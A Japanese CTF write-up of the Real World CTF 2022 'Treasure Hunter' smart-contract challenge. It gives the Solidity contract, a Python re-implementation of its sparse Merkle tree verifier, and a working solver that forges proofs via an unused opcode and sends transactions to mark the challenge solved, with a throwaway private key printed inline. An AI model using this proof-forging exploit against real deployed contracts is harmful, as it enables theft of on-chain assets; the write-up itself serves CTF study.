Real World CTF Writeup
Sun Jan 23 2022
1/21-23 に開催していた Real World CTF にチーム WreckTheLine で参加しました。結果は 5th/947 (得点のあるチームのみカウント) でした。
基本的に Pwn や Web が主体の CTF で、自分には取っ掛かりすらわからない問題だらけでした。そんな中で "Crypto" タグのついている問題が1つだけあったのでその問題を見てみると Cryptography 問ではなく Cryptocurrency 問でした…ですが最近 Capture the Ether をやり始めたのもあり、なんとか解けました。初 Cryptocurrency 問が解けたのは素直に嬉しいです。スマートな解き方はできなかった気がしますが、せっかくなので writeup を書きます。
Crypto (currency)
Treasure Hunter
21 solves
TreasureHunter.solpragma solidity >=0.8.0 <0.9.0; import {SMT} from "./SparseMerkleTree.sol"; contract TreasureHunter { bytes32 public root; SMT.Mode public smtMode = SMT.Mode.WhiteList; bool public solved = false; mapping(address => bool) public haveKey; mapping(address => bool) public haveTreasureChest; event FindKey(address indexed _from); event PickupTreasureChest(address indexed _from); event OpenTreasureChest(address indexed _from); constructor() public { root = SMT.init(); _init(); } function _init() internal { address[] memory hunters = new address[](8); hunters[0] = 0x0bc529c00C6401aEF6D220BE8C6Ea1667F6Ad93e; hunters[1] = 0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45; hunters[2] = 0x6B175474E89094C44Da98b954EedeAC495271d0F; hunters[3] = 0x6B3595068778DD592e39A122f4f5a5cF09C90fE2; hunters[4] = 0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B; hunters[5] = 0xc00e94Cb662C3520282E6f5717214004A7f26888; hunters[6] = 0xD533a949740bb3306d119CC777fa900bA034cd52; hunters[7] = 0xdAC17F958D2ee523a2206206994597C13D831ec7; SMT.Leaf[] memory nextLeaves = new SMT.Leaf[](8); SMT.Leaf[] memory prevLeaves = new SMT.Leaf[](8); for (uint8 i = 0; i < hunters.length; i++) { nextLeaves[i] = SMT.Leaf({key: hunters[i], value: 1}); prevLeaves[i] = SMT.Leaf({key: hunters[i], value: 0}); } bytes32[] memory proof = new bytes32[](22); proof[0] = 0x000000000000000000000000000000000000000000000000000000000000004c; proof[1] = 0x000000000000000000000000000000000000000000000000000000000000004c; proof[2] = 0x000000000000000000000000000000000000000000000000000000000000004c; proof[3] = 0x000000000000000000000000000000000000000000000000000000000000004c; proof[4] = 0x0000000000000000000000000000000000000000000000000000000000000048; proof[5] = 0x0000000000000000000000000000000000000000000000000000000000000095; proof[6] = 0x0000000000000000000000000000000000000000000000000000000000000048; proof[7] = 0x0000000000000000000000000000000000000000000000000000000000000099; proof[8] = 0x0000000000000000000000000000000000000000000000000000000000000048; proof[9] = 0x000000000000000000000000000000000000000000000000000000000000009e; proof[10] = 0x000000000000000000000000000000000000000000000000000000000000004c; proof[11] = 0x000000000000000000000000000000000000000000000000000000000000004c; proof[12] = 0x000000000000000000000000000000000000000000000000000000000000004c; proof[13] = 0x000000000000000000000000000000000000000000000000000000000000004c; proof[14] = 0x0000000000000000000000000000000000000000000000000000000000000048; proof[15] = 0x000000000000000000000000000000000000000000000000000000000000009b; proof[16] = 0x0000000000000000000000000000000000000000000000000000000000000048; proof[17] = 0x000000000000000000000000000000000000000000000000000000000000009c; proof[18] = 0x0000000000000000000000000000000000000000000000000000000000000048; proof[19] = 0x000000000000000000000000000000000000000000000000000000000000009e; proof[20] = 0x0000000000000000000000000000000000000000000000000000000000000048; proof[21] = 0x000000000000000000000000000000000000000000000000000000000000009f; root = SMT.update(proof, nextLeaves, prevLeaves, root); } function enter(bytes32[] memory _proofs) public { require(haveKey[msg.sender] == false); root = SMT.updateSingleTarget(_proofs, msg.sender, root, SMT.Method.Insert); } function leave(bytes32[] memory _proofs) public { require(haveTreasureChest[msg.sender] == false); root = SMT.updateSingleTarget(_proofs, msg.sender, root, SMT.Method.Delete); } function findKey(bytes32[] memory _proofs) public { require(smtMode == SMT.Mode.BlackList, "not blacklist mode"); address[] memory targets = new address[](1); targets[0] = msg.sender; require(SMT.verifyByMode(_proofs, targets, root, smtMode), "hunter has fallen into a trap"); haveKey[msg.sender] = true; smtMode = SMT.Mode.WhiteList; emit FindKey(msg.sender); } function pickupTreasureChest(bytes32[] memory _proofs) public { require(smtMode == SMT.Mode.WhiteList, "not whitelist mode"); address[] memory targets = new address[](1); targets[0] = msg.sender; require( SMT.verifyByMode(_proofs, targets, root, smtMode), "hunter hasn't found the treasure chest" ); haveTreasureChest[msg.sender] = true; smtMode = SMT.Mode.BlackList; emit PickupTreasureChest(msg.sender); } function openTreasureChest() public { require(haveKey[msg.sender] && haveTreasureChest[msg.sender]); solved = true; emit OpenTreasureChest(msg.sender); } function isSolved() public view returns (bool) { return solved; } }
SparseMerkleTree.solpragma solidity >=0.8.0 <0.9.0; uint256 constant SMT_STACK_SIZE = 32; uint256 constant DEPTH = 160; library SMT { struct Leaf { address key; uint8 value; } enum Mode { BlackList, WhiteList } enum Method { Insert, Delete } function init() internal pure returns (bytes32) { return 0; } function calcLeaf(Leaf memory a) internal pure returns (bytes32) { if (a.value == 0) { return 0; } else { return keccak256(abi.encode(a.key, a.value)); } } function merge(bytes32 l, bytes32 r) internal pure returns (bytes32) { if (l == 0) { return r; } else if (r == 0) { return l; } else { return keccak256(abi.encode(l, r)); } } function verifyByMode( bytes32[] memory _proofs, address[] memory _targets, bytes32 _expectedRoot, Mode _mode ) internal pure returns (bool) { Leaf[] memory leaves = new Leaf[](_targets.length); for (uint256 i = 0; i < _targets.length; i++) { leaves[i] = Leaf({key: _targets[i], value: uint8(_mode)}); } return verify(_proofs, leaves, _expectedRoot); } function verify( bytes32[] memory _proofs, Leaf[] memory _leaves, bytes32 _expectedRoot ) internal pure returns (bool) { return (calcRoot(_proofs, _leaves, _expectedRoot) == _expectedRoot); } function updateSingleTarget( bytes32[] memory _proofs, address _target, bytes32 _prevRoot, Method _method ) internal pure returns (bytes32) { Leaf[] memory nextLeaves = new Leaf[](1); Leaf[] memory prevLeaves = new Leaf[](1); nextLeaves[0] = Leaf({key: _target, value: uint8(_method) ^ 1}); prevLeaves[0] = Leaf({key: _target, value: uint8(_method)}); return update(_proofs, nextLeaves, prevLeaves, _prevRoot); } function update( bytes32[] memory _proofs, Leaf[] memory _nextLeaves, Leaf[] memory _prevLeaves, bytes32 _prevRoot ) internal pure returns (bytes32) { require(verify(_proofs, _prevLeaves, _prevRoot), "update proof not valid"); return calcRoot(_proofs, _nextLeaves, _prevRoot); } function checkGroupSorted(Leaf[] memory _leaves) internal pure returns (bool) { require(_leaves.length >= 1); uint160 temp = 0; for (uint256 i = 0; i < _leaves.length; i++) { if (temp >= uint160(_leaves[i].key)) { return false; } temp = uint160(_leaves[i].key); } return true; } function getBit(uint160 key, uint256 height) internal pure returns (uint256) { require(height <= DEPTH); return (key >> height) & 1; } function parentPath(uint160 key, uint256 height) internal pure returns (uint160) { require(height <= DEPTH); return copyBit(key, height + 1); } function copyBit(uint160 key, uint256 height) internal pure returns (uint160) { require(height <= DEPTH); return ((key >> height) << height); } function calcRoot( bytes32[] memory _proofs, Leaf[] memory _leaves, bytes32 _root ) internal pure returns (bytes32) { require(checkGroupSorted(_leaves)); uint160[] memory stackKeys = new uint160[](SMT_STACK_SIZE); bytes32[] memory stackValues = new bytes32[](SMT_STACK_SIZE); uint256 proofIndex = 0; uint256 leaveIndex = 0; uint256 stackTop = 0; while (proofIndex < _proofs.length) { if (uint256(_proofs[proofIndex]) == 0x4c) { proofIndex++; require(stackTop < SMT_STACK_SIZE); require(leaveIndex < _leaves.length); stackKeys[stackTop] = uint160(_leaves[leaveIndex].key); stackValues[stackTop] = calcLeaf(_leaves[leaveIndex]); stackTop++; leaveIndex++; } else if (uint256(_proofs[proofIndex]) == 0x50) { proofIndex++; require(stackTop != 0); require(proofIndex + 2 <= _proofs.length); uint256 height = uint256(_proofs[proofIndex++]); bytes32 currentProof = _proofs[proofIndex++]; require(currentProof != _root); if (getBit(stackKeys[stackTop - 1], height) == 1) { stackValues[stackTop - 1] = merge(currentProof, stackValues[stackTop - 1]); } else { stackValues[stackTop - 1] = merge(stackValues[stackTop - 1], currentProof); } stackKeys[stackTop - 1] = parentPath(stackKeys[stackTop - 1], height); } else if (uint256(_proofs[proofIndex]) == 0x48) { proofIndex++; require(stackTop >= 2); require(proofIndex < _proofs.length); uint256 height = uint256(_proofs[proofIndex++]); uint256 aSet = getBit(stackKeys[stackTop - 2], height); uint256 bSet = getBit(stackKeys[stackTop - 1], height); stackKeys[stackTop - 2] = parentPath(stackKeys[stackTop - 2], height); stackKeys[stackTop - 1] = parentPath(stackKeys[stackTop - 1], height); require(stackKeys[stackTop - 2] == stackKeys[stackTop - 1] && aSet != bSet); if (aSet == 1) { stackValues[stackTop - 2] = merge( stackValues[stackTop - 1], stackValues[stackTop - 2] ); } else { stackValues[stackTop - 2] = merge( stackValues[stackTop - 2], stackValues[stackTop - 1] ); } stackTop -= 1; } else { revert(); } } require(leaveIndex == _leaves.length); require(stackTop == 1); return stackValues[0]; } }
TreasureHunter の findKey や pickupTreasureChest を適切な引数を与えて呼び、 haveKey[msg.sender] && haveTreasureChest[msg.sender] を満たすようにすればフラグが手に入ります。
ひとまずアカウントの発行、 faucet から ETH 取得、 contract の deploy を行います。
処理の流れを理解するため、 SMT library の calcRoot の動作を重点的に追いました。 stack machine になっており、値 (leaves) を stack に追加したり、 stack 上の値を concat して hash を取ったりするような計算をしています。 いろいろ実験するため、 python で再実装しました。
from binascii import unhexlify from dataclasses import dataclass from typing import List, Sequence, Union from Crypto.Util.number import bytes_to_long from eth_abi.abi import encode_abi from web3 import Web3 def my_hash(a: bytes, b: Union[int, bytes]) -> bytes: if isinstance(b, int): return unhexlify(Web3.keccak(encode_abi(['address', 'uint8'], ["0x" + a.hex(), b])).hex()[2:]) elif isinstance(b, bytes): return unhexlify(Web3.keccak(encode_abi(['bytes32', 'bytes32'], [a, b])).hex()[2:]) else: raise ValueError @dataclass class Leaf: key: bytes value: int SMT_STACK_SIZE = 32 DEPTH = 160 def calc_leaf(leaf: Leaf) -> bytes: if leaf.value == 0: return b"\x00" * 32 else: return my_hash(leaf.key, leaf.value) def get_bit(key: int, height: int) -> int: assert height <= DEPTH return (key >> height) & 1 def merge(l: bytes, r: bytes) -> bytes: if bytes_to_long(l) == 0: return r elif bytes_to_long(r) == 0: return l else: return my_hash(l, r) def copy_bit(key: int, height: int) -> int: assert height <= DEPTH return (key >> height) << height def parent_path(key: int, height: int) -> int: assert height <= DEPTH return copy_bit(key, height + 1) def calc_root(proofs: Sequence[bytes], leaves: Sequence[Leaf], root: bytes) -> bytes: stack_keys: List[int] = [0] * SMT_STACK_SIZE stack_values: List[bytes] = [b"\x00" * 32] * SMT_STACK_SIZE proof_index = 0 leave_index = 0 stack_top = 0 while proof_index < len(proofs): if bytes_to_long(proofs[proof_index]) == 0x4c: proof_index += 1 assert stack_top < SMT_STACK_SIZE assert leave_index < len(leaves) stack_keys[stack_top] = bytes_to_long(leaves[leave_index].key) stack_values[stack_top] = calc_leaf(leaves[leave_index]) stack_top += 1 leave_index += 1 # input: [0x50, height, current_proof] # use stack_keys[-2], stack_keys[-1] # output to the top of stack_values elif bytes_to_long(proofs[proof_index]) == 0x50: proof_index += 1 assert stack_top != 0 assert proof_index + 2 <= len(proofs) height = bytes_to_long(proofs[proof_index]) proof_index += 1 current_proof = proofs[proof_index] proof_index += 1 assert current_proof != root if get_bit(stack_keys[stack_top - 1], height) == 1: stack_values[stack_top - 1] = merge(current_proof, stack_values[stack_top - 1]) else: stack_values[stack_top - 1] = merge(stack_values[stack_top - 1], current_proof) stack_keys[stack_top - 1] = parent_path(stack_keys[stack_top - 1], height) # input: [0x48, height] # use stack_keys[-2], stack_keys[-1] # output to the top of stack_values elif bytes_to_long(proofs[proof_index]) == 0x48: proof_index += 1 assert stack_top >= 2 assert proof_index < len(proofs) height = bytes_to_long(proofs[proof_index]) proof_index += 1 a_set = get_bit(stack_keys[stack_top - 2], height) b_set = get_bit(stack_keys[stack_top - 1], height) stack_keys[stack_top - 2] = parent_path(stack_keys[stack_top - 2], height) stack_keys[stack_top - 1] = parent_path(stack_keys[stack_top - 1], height) assert stack_keys[stack_top - 2] == stack_keys[stack_top - 1] and a_set != b_set if a_set == 1: stack_values[stack_top - 2] = merge(stack_values[stack_top - 1], stack_values[stack_top - 2]) else: stack_values[stack_top - 2] = merge(stack_values[stack_top - 2], stack_values[stack_top - 1]) stack_top -= 1 else: raise ValueError print(stack_keys[:stack_top]) print(stack_values[:stack_top]) assert leave_index == len(leaves) assert stack_top == 1 return stack_values[0] def verify(proofs: Sequence[bytes], leaves: Sequence[Leaf], expected_root: bytes) -> bool: return calc_root(proofs, leaves, expected_root) == expected_root def update(proofs: Sequence[bytes], next_leaves: Sequence[Leaf], prev_leaves: Sequence[Leaf], prev_root: bytes) -> bytes: assert verify(proofs, prev_leaves, prev_root) return calc_root(proofs, next_leaves, prev_root) def update_single_target(proofs: Sequence[bytes], target: bytes, prev_root: bytes, method: int) -> bytes: next_leaves = [Leaf(key=target, value=method ^ 1)] prev_leaves = [Leaf(key=target, value=method)] return update(proofs, next_leaves, prev_leaves, prev_root)
これで再現できているかは以下のコードで確認しました。実際の contract の root と再計算した root とが一致しているかを確認しています。 contract_abi は Remix で TreasureHunter.sol をコンパイルし、 Compilation Details から ABI を取得したものです。
from const import contract_abi w3 = Web3(Web3.HTTPProvider("")) addr_contract = "0xAd0306d232E7aE7Ec4f73fd1ecc1e285f6f72945" contract = w3.eth.contract(address=addr_contract, abi=contract_abi) hunters = [ long_to_bytes(0x0bc529c00C6401aEF6D220BE8C6Ea1667F6Ad93e), long_to_bytes(0x68b3465833fb72A70ecDF485E0e4C7bD8665Fc45), long_to_bytes(0x6B175474E89094C44Da98b954EedeAC495271d0F), long_to_bytes(0x6B3595068778DD592e39A122f4f5a5cF09C90fE2), long_to_bytes(0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B), long_to_bytes(0xc00e94Cb662C3520282E6f5717214004A7f26888), long_to_bytes(0xD533a949740bb3306d119CC777fa900bA034cd52), long_to_bytes(0xdAC17F958D2ee523a2206206994597C13D831ec7), ] leaves = [Leaf(key=hunter, value=1) for hunter in hunters] proofs = [ long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000004c, 32), long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000004c, 32), long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000004c, 32), long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000004c, 32), long_to_bytes(0x0000000000000000000000000000000000000000000000000000000000000048, 32), long_to_bytes(0x0000000000000000000000000000000000000000000000000000000000000095, 32), long_to_bytes(0x0000000000000000000000000000000000000000000000000000000000000048, 32), long_to_bytes(0x0000000000000000000000000000000000000000000000000000000000000099, 32), long_to_bytes(0x0000000000000000000000000000000000000000000000000000000000000048, 32), long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000009e, 32), long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000004c, 32), long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000004c, 32), long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000004c, 32), long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000004c, 32), long_to_bytes(0x0000000000000000000000000000000000000000000000000000000000000048, 32), long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000009b, 32), long_to_bytes(0x0000000000000000000000000000000000000000000000000000000000000048, 32), long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000009c, 32), long_to_bytes(0x0000000000000000000000000000000000000000000000000000000000000048, 32), long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000009e, 32), long_to_bytes(0x0000000000000000000000000000000000000000000000000000000000000048, 32), long_to_bytes(0x000000000000000000000000000000000000000000000000000000000000009f, 32), ] root = calc_root(proofs, leaves, b"\x00" * 32) assert root == contract.functions.root().call()
まず pickupTreasureChest を通すような引数 proofs を考えます。 init でセットされた root を、 Leaf(key=msg.sender, value=1) から生成するのは難しそうなため、 pickupTreasureChest の前に enter で root を更新します。 enter では [Leaf(key=msg.sender, value=0)] が leaves のときに calcRoot の結果が root となるような proofs を指定できます。 python 実装の calc_root で init 時の stack の変化を観察すると、 root の hash が計算されるときの2つの hash がわかります。すなわち root = hash(stack[-1], stack[-2]) となる stack です。 これを求めるため、以下の get_stack_values_history を書きました。ほぼ calc_root のコピペですが。
def get_stack_values_history(proofs: Sequence[bytes], leaves: Sequence[Leaf], root: bytes) -> Sequence[Sequence[bytes]]: stack_keys: List[int] = [0] * SMT_STACK_SIZE stack_values: List[bytes] = [b"\x00" * 32] * SMT_STACK_SIZE history_stack = [] proof_index = 0 leave_index = 0 stack_top = 0 while proof_index < len(proofs): if bytes_to_long(proofs[proof_index]) == 0x4c: proof_index += 1 assert stack_top < SMT_STACK_SIZE assert leave_index < len(leaves) stack_keys[stack_top] = bytes_to_long(leaves[leave_index].key) stack_values[stack_top] = calc_leaf(leaves[leave_index]) stack_top += 1 leave_index += 1 # input: [0x50, height, current_proof] # use stack_keys[-2], stack_keys[-1] # output to the top of stack_values elif bytes_to_long(proofs[proof_index]) == 0x50: proof_index += 1 assert stack_top != 0 assert proof_index + 2 <= len(proofs) height = bytes_to_long(proofs[proof_index]) proof_index += 1 current_proof = proofs[proof_index] proof_index += 1 assert current_proof != root if get_bit(stack_keys[stack_top - 1], height) == 1: stack_values[stack_top - 1] = merge(current_proof, stack_values[stack_top - 1]) else: stack_values[stack_top - 1] = merge(stack_values[stack_top - 1], current_proof) stack_keys[stack_top - 1] = parent_path(stack_keys[stack_top - 1], height) # input: [0x48, height] # use stack_keys[-2], stack_keys[-1] # output to the top of stack_values elif bytes_to_long(proofs[proof_index]) == 0x48: proof_index += 1 assert stack_top >= 2 assert proof_index < len(proofs) height = bytes_to_long(proofs[proof_index]) proof_index += 1 a_set = get_bit(stack_keys[stack_top - 2], height) b_set = get_bit(stack_keys[stack_top - 1], height) stack_keys[stack_top - 2] = parent_path(stack_keys[stack_top - 2], height) stack_keys[stack_top - 1] = parent_path(stack_keys[stack_top - 1], height) assert stack_keys[stack_top - 2] == stack_keys[stack_top - 1] and a_set != b_set if a_set == 1: stack_values[stack_top - 2] = merge(stack_values[stack_top - 1], stack_values[stack_top - 2]) else: stack_values[stack_top - 2] = merge(stack_values[stack_top - 2], stack_values[stack_top - 1]) stack_top -= 1 else: raise ValueError history_stack.append(stack_values[:stack_top].copy()) assert leave_index == len(leaves) assert stack_top == 1 return history_stack
これで求まった stack の値を使う proofs を作っていきます。 init のときに使われなかった op の 0x50 に注目すると、 proofs 内の値を stack に積むことができるため、これを利用します。 以下の proofs を作ることで enter が通って root を更新できること、さらに pickupTreasureChest が通ることが確認できました。
history = get_stack_values_history(proofs, leaves, b"\x00" * 32) # To send transaction, we need another account because we don't know the private key of given account. # tmp_acc = w3.eth.account.create() # player = tmp_acc.address # 0x7BDf56e66e7E5C490E7166BFABDBc1EDf9B66345 # private_key = tmp_acc.privateKey.hex() # 0xa9f5f4d1184800568ed0ba05b51b088f898cd98e4170245f4aa90421e486abbd player = "0x7BDf56e66e7E5C490E7166BFABDBc1EDf9B66345" private_key = "0xa9f5f4d1184800568ed0ba05b51b088f898cd98e4170245f4aa90421e486abbd" sender = long_to_bytes(int(player, 16)) proofs = [ long_to_bytes(0x4c, 32), long_to_bytes(0x50, 32), long_to_bytes(0, 32), history[-2][0], long_to_bytes(0x50, 32), long_to_bytes(0x9f, 32), history[-2][1], ] # Call enter root_updated = update_single_target(proofs, sender, root, 0) # This means calling pickupTreasureChest results in success and haveTreasureChest[msg.sender] = true assert verify(proofs, [Leaf(key=sender, value=1)], root_updated)
これを実際の contract の function に与えて呼び出します。 assert 文で root が更新されたこと、 haveTreasureChest が true になったこと、 smtMode が切り替わっていることが確認しています。
def get_nonce(addr): return w3.eth.get_transaction_count(addr) def get_transaction_body(addr): return { "nonce": get_nonce(addr), "gas": 1239137, "gasPrice": 21000000000, "value": 0, "from": addr, } def send_transaction(addr, func_name: str, *func_args): transaction_body = get_transaction_body(addr) function_call = contract.functions[func_name](*func_args).buildTransaction(transaction_body) signed_transaction = w3.eth.account.sign_transaction(function_call, private_key) result = w3.eth.send_raw_transaction(signed_transaction.rawTransaction) tx_hash = w3.eth.wait_for_transaction_receipt(result) return tx_hash send_transaction(player, "enter", ["0x" + proof.hex() for proof in proofs]) assert contract.functions.root().call() == root_updated send_transaction(player, "pickupTreasureChest", ["0x" + proof.hex() for proof in proofs]) assert contract.functions.root().call() == root_updated assert contract.functions.smtMode().call() == 0 assert contract.functions.haveTreasureChest(player).call()
続いて findKey を通すことを考えます。こちらも前の calcRoot での stack の値を使うことで、適切な proofs を作れそうです。
history = get_stack_values_history(proofs, [Leaf(key=sender, value=1)], root_updated) proofs = [ long_to_bytes(0x4c, 32), long_to_bytes(0x50, 32), long_to_bytes(0, 32), history[-2][0], long_to_bytes(0x50, 32), long_to_bytes(0x9f, 32), proofs[-1], ] assert verify(proofs, [Leaf(key=sender, value=0)], root_updated)
この proofs を使って findKey を呼び出します。
send_transaction(player, "findKey", ["0x" + proof.hex() for proof in proofs]) assert contract.functions.smtMode().call() == 1 assert contract.functions.root().call() == root_updated assert contract.functions.haveKey(player).call()
最後に openTreasureChest を呼ぶことで solved が true となり、フラグ入手の条件を満たせます。
send_transaction(player, "openTreasureChest") assert contract.functions.isSolved().call()
このようにまとめると順調な感じで解いたように見えますが、めちゃくちゃ詰まりました… (丸一日 + 数時間) Cryptocurrency 問に不慣れだったため仕方なし。今後のために詰まったポイントをメモしておきます。
- 与えられたアカウントの private key がわからない
アカウントを生成するとき、 address と token が与えられるのですが、 private key は与えられません。そのため、与えられたアカウントでは transaction を行うことができません。 以上の writeup では transaction 用のアカウントを自前で作ることでこれを解決しています。 競技中の自分は、この問題の本質は token から private key を求める部分で、これがまさしく Crypto 問なのでは、などと大きく勘違いをし、迷走していました…ずっと pasato の仕様を読み込んでいました。
- 自前の contract を deploy できない
Capture the Ether で relay contract を学んでいたので、 Solver 用の contract を自前実装し、それを使ってこの問題を解こうと考えていました。実装はこちら。
pragma solidity >=0.8.0 <0.9.0; import {TreasureHunter} from "./TreasureHunter.sol"; contract TreasureHunterSolver { constructor() public { } function enter(address _addr, bytes32[] memory _proofs) public { TreasureHunter th = TreasureHunter(_addr); th.enter(_proofs); } function leave(address _addr, bytes32[] memory _proofs) public { TreasureHunter th = TreasureHunter(_addr); th.leave(_proofs); } function findKey(address _addr, bytes32[] memory _proofs) public { TreasureHunter th = TreasureHunter(_addr); th.findKey(_proofs); } function pickupTreasureChest(address _addr, bytes32[] memory _proofs) public { TreasureHunter th = TreasureHunter(_addr); th.pickupTreasureChest(_proofs); } function openTreasureChest(address _addr) public { TreasureHunter th = TreasureHunter(_addr); th.openTreasureChest(); } function isSolved(address _addr) public view returns (bool) { TreasureHunter th = TreasureHunter(_addr); return th.isSolved(); } }
この contract から、問題用 contract を呼び出して問題を解こうとしました。しかし、何故か deploy ができません… deploy に使用したコードは以下になります。
solver_player = "0x7BDf56e66e7E5C490E7166BFABDBc1EDf9B66345" solver_private_key = "0xa9f5f4d1184800568ed0ba05b51b088f898cd98e4170245f4aa90421e486abbd" solver_transaction_body = { "nonce": get_nonce(player), "gas": 1239137, "gasPrice": 21000000000, "value": 0, "from": solver_player, "chainId": w3.eth.chain_id, } solver_contract = w3.eth.contract(abi=solver_contract_abi, bytecode=json.loads(solver_bytecode)["object"]) solver_function_call = solver_contract.constructor().buildTransaction(solver_transaction_body) solver_signed_transaction = w3.eth.account.sign_transaction(solver_function_call, solver_private_key) result = w3.eth.send_raw_transaction(solver_signed_transaction.rawTransaction) # これが一生終わらない tx_hash = w3.eth.wait_for_transaction_receipt(result)
deploy した transaction が全然 block に繋がらないようです。 これは原因はまだわかっていません。 geth の設定の問題なんですかね。 冷静に考えると relay にする必要が一切なかったため、以上の問題ではこの Solver contract は使用していません。